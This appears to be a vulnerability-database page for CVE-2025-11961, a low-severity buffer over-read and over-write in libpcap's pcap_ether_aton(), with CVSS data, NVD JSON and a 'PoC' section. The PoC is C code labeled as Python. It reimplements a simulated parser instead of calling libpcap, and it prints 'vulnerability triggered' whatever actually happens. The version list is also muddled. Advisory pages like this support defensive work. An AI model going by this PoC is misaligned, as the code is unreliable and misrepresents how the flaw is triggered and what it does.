Security Vulnerability Report
中文
CVE-2025-11961 CVSS 1.9 LOW

CVE-2025-11961

Published: 2025-12-31 01:15:55
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer. The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented. If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer.

CVSS Details

CVSS Score
1.9
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

libpcap < 1.10.5
libpcap < 1.11.0 (patched versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-11961 PoC - libpcap pcap_ether_aton() Buffer Overflow // This PoC demonstrates how malformed MAC address input can cause buffer overflow #include <stdio.h> #include <stdlib.h> #include <string.h> #include <pcap.h> // Simulated version of vulnerable pcap_ether_aton function // Original function in libpcap doesn't properly validate input format char* vulnerable_pcap_ether_aton(const char* addr_str) { // Allocate fixed-size buffer for MAC address (6 bytes) char* result = (char*)malloc(6); if (!result) return NULL; // Vulnerable parsing - no proper bounds checking // When input is malformed, reads beyond string boundary int i = 0; const char* ptr = addr_str; while (*ptr && i < 6) { // Skip non-hex characters (vulnerable - continues reading beyond intended format) while (*ptr && !((*ptr >= '0' && *ptr <= '9') || (*ptr >= 'A' && *ptr <= 'F') || (*ptr >= 'a' && *ptr <= 'f'))) { ptr++; // Can read beyond string end if malformed } if (*ptr == '\0') break; // Parse byte without proper validation char byte_str[3] = {ptr[0], ptr[1], '\0'}; result[i++] = (char)strtol(byte_str, NULL, 16); ptr += 2; } return result; } int main() { printf("CVE-2025-11961 PoC - libpcap pcap_ether_aton() Buffer Overflow\n"); printf("=============================================================\n\n"); // Malformed MAC address that triggers the vulnerability // String shorter than expected format causes out-of-bounds read const char* malformed_mac = "AA:BB:CC"; // Incomplete MAC address printf("Testing with malformed MAC address: %s\n", malformed_mac); printf("Input length: %zu bytes\n", strlen(malformed_mac)); // Call vulnerable function char* result = vulnerable_pcap_ether_aton(malformed_mac); if (result) { printf("Result: "); for (int i = 0; i < 6; i++) { printf("%02X:", (unsigned char)result[i]); } printf("\n"); free(result); } printf("\nVulnerability triggered - function read beyond input boundaries\n"); printf("Fix: Update to patched libpcap version\n"); return 0; } // Build: gcc -o poc poc.c // Note: This PoC demonstrates the vulnerability concept. Actual exploitation requires specific conditions.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11961", "sourceIdentifier": "[email protected]", "published": "2025-12-31T01:15:54.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer. The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented. If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer."}, {"lang": "es", "value": "pcap_ether_aton() es una función auxiliar en libpcap, toma un argumento de cadena y devuelve un búfer asignado de tamaño fijo. El argumento de cadena debe ser una dirección MAC-48 bien formada en uno de los formatos admitidos, pero este requisito ha sido mal documentado. Si una aplicación llama a la función con un argumento que se desvía del formato esperado, la función puede leer datos más allá del final de la cadena proporcionada y escribir datos más allá del final del búfer asignado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-126"}]}], "references": [{"url": "https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.